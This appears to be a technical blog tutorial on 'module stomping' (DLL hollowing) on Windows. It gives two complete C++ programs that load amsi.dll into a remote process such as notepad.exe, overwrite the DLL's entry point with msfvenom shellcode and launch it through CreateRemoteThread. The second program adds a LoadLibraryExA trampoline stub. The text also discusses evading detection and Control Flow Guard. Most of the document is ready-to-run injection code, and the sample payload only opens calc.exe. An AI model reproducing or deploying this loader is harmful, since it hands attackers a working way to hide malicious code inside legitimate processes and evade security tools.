Module Stomping

Module stomping is a form of DLL injection; however, we inject a legitimate DLL into a remote process and then overwrite the DLL’s code. The benefit of this technique is that our shellcode will be executed from a region of backed memory (i.e., a memory region within the range of a loaded module). Module stomping is sometimes referred to as DLL hollowing.

There are a couple of ways to carry this out. First, let’s look at performing module stomping using LoadLibraryA.


LoadLibraryA Module Stomping

The following steps need to occur:

  • Get a handle to the remote process using OpenProcess
  • Allocate memory in the remote process with VirtualAllocEx, and write the name of the legitimate DLL we want to load using WriteProcessMemory
  • Use CreateRemoteThread to execute LoadLibraryA, using a pointer to our DLL name as its parameter
  • Retrieve the DLL entry point for the module we just loaded.
  • Use WriteProcessMemory to overwrite the DLL entry point with our shellcode
  • Use CreateRemoteThread again with the DLL entry point

The below code implements these steps.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <iostream>
#include <TlHelp32.h>
#include <Psapi.h>
#include <tchar.h>

using namespace std;

// Finds a module by name in the process referred to by hProcess and returns
// the base address recorded for it in a Toolhelp module snapshot.
//
// hProcess - handle to the process whose module list is inspected.
// dllName  - module file name to look for; compared case-insensitively
//            against each snapshot entry's szModule field.
//
// Returns the module's base address, or 0 when the handle is NULL, the
// snapshot cannot be created, or no entry matches dllName.
DWORD_PTR GetRemoteDllLoadAddress(HANDLE hProcess, const TCHAR* dllName) {
    if (!hProcess) {
        std::cerr << "Invalid process handle." << std::endl;
        return 0;
    }

    const DWORD snapshotFlags = TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32;
    HANDLE moduleSnapshot = CreateToolhelp32Snapshot(snapshotFlags, GetProcessId(hProcess));
    if (moduleSnapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot." << std::endl;
        return 0;
    }

    // dwSize is filled in before the entry is handed to Module32First.
    MODULEENTRY32 entry;
    entry.dwSize = sizeof(entry);

    DWORD_PTR baseAddress = 0;
    for (BOOL more = Module32First(moduleSnapshot, &entry); more; more = Module32Next(moduleSnapshot, &entry)) {
        if (_tcsicmp(entry.szModule, dllName) != 0) {
            continue;
        }
        // First match wins; stop walking the snapshot.
        baseAddress = reinterpret_cast<DWORD_PTR>(entry.modBaseAddr);
        break;
    }

    CloseHandle(moduleSnapshot);
    return baseAddress;
}


// Reads the PE headers of a module out of another process and computes the
// address of its entry point.
//
// hProcess    - handle used for the ReadProcessMemory calls.
// loadAddress - base address of the module inside that process.
//
// Returns loadAddress + OptionalHeader.AddressOfEntryPoint, or 0 when an
// argument is NULL/0, a header cannot be read in full, or a header signature
// does not match.
DWORD_PTR GetRemoteDllEntryPoint(HANDLE hProcess, DWORD_PTR loadAddress) {
    if (!hProcess || !loadAddress) {
        std::cerr << "Invalid process handle or load address." << std::endl;
        return 0;
    }

    SIZE_T copied;

    // The DOS header sits at the very start of the module image.
    IMAGE_DOS_HEADER dos;
    const BOOL dosRead = ReadProcessMemory(hProcess, reinterpret_cast<LPCVOID>(loadAddress), &dos, sizeof(dos), &copied);
    if (!dosRead || copied != sizeof(dos)) {
        std::cerr << "Failed to read DOS header." << std::endl;
        return 0;
    }
    if (dos.e_magic != IMAGE_DOS_SIGNATURE) {
        std::cerr << "Invalid DOS header." << std::endl;
        return 0;
    }

    // e_lfanew is the offset from the image base to the NT headers.
    const DWORD_PTR ntHeadersAddress = loadAddress + dos.e_lfanew;
    IMAGE_NT_HEADERS nt;
    const BOOL ntRead = ReadProcessMemory(hProcess, reinterpret_cast<LPCVOID>(ntHeadersAddress), &nt, sizeof(nt), &copied);
    if (!ntRead || copied != sizeof(nt)) {
        std::cerr << "Failed to read NT headers." << std::endl;
        return 0;
    }
    if (nt.Signature != IMAGE_NT_SIGNATURE) {
        std::cerr << "Invalid NT headers." << std::endl;
        return 0;
    }

    // AddressOfEntryPoint is relative to the image base.
    const DWORD_PTR entryPoint = loadAddress + nt.OptionalHeader.AddressOfEntryPoint;
    return entryPoint;
}

int main(int argc, char* argv[]) {

    char sampleDLL[] = "C:\\windows\\system32\\amsi.dll";
    HANDLE process_handle;

    //Get a handle to our remote process
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));

    // Allocate memory in the remote process
    LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    // Write our DLL name to the remote process
    WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof(sampleDLL), NULL);

    //Retrieve the memory address of LoadLibraryA function
    HMODULE k32_handle = GetModuleHandle(L"Kernel32");
    VOID* load_library = GetProcAddress(k32_handle, "LoadLibraryA");

    //Execute the DLL in a new remote thread
    HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)load_library, buffer, 0, NULL);

    std::cout << "DLL Injected! Press ENTER to execute\n";
    getchar();

    const TCHAR* dllName = _T("amsi.dll"); // Specify the name of the DLL
    DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName);
    if (dllLoadAddress != 0) {
        std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl;
    }
    else {
        std::cerr << "Failed to find DLL load address." << std::endl;
    }

    DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress);
    if (entryPointAddress != 0) {
        std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl;
    }
    else {
        std::cerr << "Failed to retrieve entry point address." << std::endl;
    }

    // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";



    WriteProcessMemory(process_handle, reinterpret_cast<LPVOID>(entryPointAddress), (LPCVOID)shellcode, sizeof(shellcode), NULL);

    // execute shellcode from inside the benign DLL
    CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL);


    CloseHandle(process_handle);

    std::cout << "Execution complete\n";
    return 0;

}

It’s worth noting that the loaded DLL may be Control Flow Guard enabled, which effectively prevents us from executing from arbitrary locations in the target DLL. However, the entry point will always be executable 😃.


LoadLibraryExA Module Stomping

In the above example, we use LoadLibraryA. This does work; however, every time the DLL is loaded or unloaded, our code will execute. This may not be ideal and may lead to instability in the target process. To get around this, we can use LoadLibraryExA.

HMODULE LoadLibraryExA(
  [in] LPCSTR lpLibFileName,
       HANDLE hFile,
  [in] DWORD  dwFlags
);

The dwFlags option supports the value DONT_RESOLVE_DLL_REFERENCES, which appears to do what we want:

If this value is used, and the executable module is a DLL, the system does not call DllMain for process and thread initialization and termination. Also, the system does not load additional executable modules that are referenced by the specified module.

https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa

The problem with using LoadLibraryExA is that CreateRemoteThread only allows us to pass one argument to the thread’s start routine, and we need to supply three. To work around this, the following approach is taken:

  • Lookup the LoadLibraryExA Address in the remote process.
  • Allocate some memory in the remote process, and write an ASM stub that sets the additional function parameters we require
  • Call CreateRemoteThread, with a pointer to our ASM stub.

Our ASM stub will look something like this:

movabs rax, 0x000000000000000   - Replaced with LoadLibraryExA Address
mov    r8, 0x1                  - ARG2 
xor rdx, rdx                    - ARG1
jmp    rax      

When we call this stub using CreateRemoteThread, we can specify a single parameter (ARG0) that will end up in the RCX register. This will be a pointer to the DLL path string we wrote into the remote process.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <iostream>
#include <TlHelp32.h>
#include <Psapi.h>
#include <tchar.h>

using namespace std;

// Finds a module by name in the process referred to by hProcess and returns
// the base address recorded for it in a Toolhelp module snapshot.
//
// hProcess - handle to the process whose module list is inspected.
// dllName  - module file name to look for; compared case-insensitively
//            against each snapshot entry's szModule field.
//
// Returns the module's base address, or 0 when the handle is NULL, the
// snapshot cannot be created, or no entry matches dllName.
DWORD_PTR GetRemoteDllLoadAddress(HANDLE hProcess, const TCHAR* dllName) {
    if (!hProcess) {
        std::cerr << "Invalid process handle." << std::endl;
        return 0;
    }

    const DWORD snapshotFlags = TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32;
    HANDLE moduleSnapshot = CreateToolhelp32Snapshot(snapshotFlags, GetProcessId(hProcess));
    if (moduleSnapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot." << std::endl;
        return 0;
    }

    // dwSize is filled in before the entry is handed to Module32First.
    MODULEENTRY32 entry;
    entry.dwSize = sizeof(entry);

    DWORD_PTR baseAddress = 0;
    for (BOOL more = Module32First(moduleSnapshot, &entry); more; more = Module32Next(moduleSnapshot, &entry)) {
        if (_tcsicmp(entry.szModule, dllName) != 0) {
            continue;
        }
        // First match wins; stop walking the snapshot.
        baseAddress = reinterpret_cast<DWORD_PTR>(entry.modBaseAddr);
        break;
    }

    CloseHandle(moduleSnapshot);
    return baseAddress;
}


// Reads the PE headers of a module out of another process and computes the
// address of its entry point.
//
// hProcess    - handle used for the ReadProcessMemory calls.
// loadAddress - base address of the module inside that process.
//
// Returns loadAddress + OptionalHeader.AddressOfEntryPoint, or 0 when an
// argument is NULL/0, a header cannot be read in full, or a header signature
// does not match.
DWORD_PTR GetRemoteDllEntryPoint(HANDLE hProcess, DWORD_PTR loadAddress) {
    if (!hProcess || !loadAddress) {
        std::cerr << "Invalid process handle or load address." << std::endl;
        return 0;
    }

    SIZE_T copied;

    // The DOS header sits at the very start of the module image.
    IMAGE_DOS_HEADER dos;
    const BOOL dosRead = ReadProcessMemory(hProcess, reinterpret_cast<LPCVOID>(loadAddress), &dos, sizeof(dos), &copied);
    if (!dosRead || copied != sizeof(dos)) {
        std::cerr << "Failed to read DOS header." << std::endl;
        return 0;
    }
    if (dos.e_magic != IMAGE_DOS_SIGNATURE) {
        std::cerr << "Invalid DOS header." << std::endl;
        return 0;
    }

    // e_lfanew is the offset from the image base to the NT headers.
    const DWORD_PTR ntHeadersAddress = loadAddress + dos.e_lfanew;
    IMAGE_NT_HEADERS nt;
    const BOOL ntRead = ReadProcessMemory(hProcess, reinterpret_cast<LPCVOID>(ntHeadersAddress), &nt, sizeof(nt), &copied);
    if (!ntRead || copied != sizeof(nt)) {
        std::cerr << "Failed to read NT headers." << std::endl;
        return 0;
    }
    if (nt.Signature != IMAGE_NT_SIGNATURE) {
        std::cerr << "Invalid NT headers." << std::endl;
        return 0;
    }

    // AddressOfEntryPoint is relative to the image base.
    const DWORD_PTR entryPoint = loadAddress + nt.OptionalHeader.AddressOfEntryPoint;
    return entryPoint;
}


LPVOID loadlibrary_gadget(void* ptr_load_libraryex, HANDLE process_handle)
{
    //Add the LoadLibraryExA instruction to our trampoline
    // 48 b8 00 00 00 00 00         movabs rax, 0x000000000000000   - LoadLibraryExA Address
    // 7 : 00 00 00
    // a : 49 c7 c0 01 00 00 00     mov    r8, 0x1                  - ARG2
    // 11 : 48 31 d2                xor rdx, rdx                    - ARG1
    // 14 : ff e0                   jmp    rax                      
    uint8_t load_libary_ex_instructions[] = 
{0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x31, 0xD2, 0xFF, 0xE0};
    memcpy(&load_libary_ex_instructions[2], &ptr_load_libraryex, sizeof(ptr_load_libraryex));
    // Allocate memory in remote process and write to it
    LPVOID gadget_buffer = VirtualAllocEx(process_handle, NULL, sizeof(load_libary_ex_instructions), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(process_handle, gadget_buffer, load_libary_ex_instructions, sizeof(load_libary_ex_instructions), NULL);
    return gadget_buffer;
}

// Walks a Toolhelp process snapshot and returns the process ID of the first
// entry whose executable file name equals processName (case-insensitive).
//
// Returns 0 when the snapshot cannot be created, the first entry cannot be
// read, or no entry matches.
DWORD GetProcessIdByName(const TCHAR* processName) {
    HANDLE processSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (processSnapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    // dwSize is filled in before the entry is handed to Process32First.
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(entry);

    DWORD matchedPid = 0;
    for (BOOL more = Process32First(processSnapshot, &entry); more; more = Process32Next(processSnapshot, &entry)) {
        if (_tcsicmp(entry.szExeFile, processName) == 0) {
            matchedPid = entry.th32ProcessID;
            break;
        }
    }

    // Single exit path: the snapshot handle is always released here.
    CloseHandle(processSnapshot);
    return matchedPid;
}

int main(int argc, char* argv[]) {

    HANDLE process_handle;

    //Get a handle to our remote process    
    const TCHAR* processName = _T("notepad.exe");
    DWORD pid = GetProcessIdByName(processName);
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    // Allocate memory in the remote process
    char sampleDLL[] = "C:\\windows\\system32\\amsi.dll";
    LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    // Write our DLL to the remote process
    WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof(sampleDLL), NULL);

    //Retrieve the memory address of LoadLibraryA function
    HMODULE k32_handle = GetModuleHandle(L"Kernel32");
    VOID* load_library = GetProcAddress(k32_handle, "LoadLibraryExA");

    // Get a pointer to our LoadLibraryExA gadget
    std::cout << "LoadLibraryExA address " << ": 0x" << std::hex << load_library << std::endl;
    LPVOID gadget_buffer = loadlibrary_gadget(load_library, process_handle);
    std::cout << "Gadget buffer " << ": 0x" << std::hex << gadget_buffer << std::endl;

    HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)gadget_buffer, buffer, 0, NULL);
    std::cout << "DLL Injected! Press ENTER to execute\n";
    getchar();

    const TCHAR* dllName = _T("amsi.dll"); // Specify the name of the DLL
    DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName);
    if (dllLoadAddress != 0) {
        std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl;
    }
    else {
        std::cerr << "Failed to find DLL load address." << std::endl;
    }

    DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress);
    if (entryPointAddress != 0) {
        std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl;
    }
    else {
        std::cerr << "Failed to retrieve entry point address." << std::endl;
    }

    // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";


    WriteProcessMemory(process_handle, reinterpret_cast<LPVOID>(entryPointAddress), (LPCVOID)shellcode, sizeof(shellcode), NULL);

    // execute shellcode from inside the benign DLL
    CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL);


    CloseHandle(process_handle);

    std::cout << "Execution complete\n";
    return 0;

}

In Conclusion

LoadLibraryExA module stomping does prevent the issue of the payload being executed multiple times; however, it requires using VirtualAllocEx to allocate unbacked memory in the remote process, which in itself may be suspicious. An alternative may be implementing a mutex in the payload to ensure only one instance executes at a time.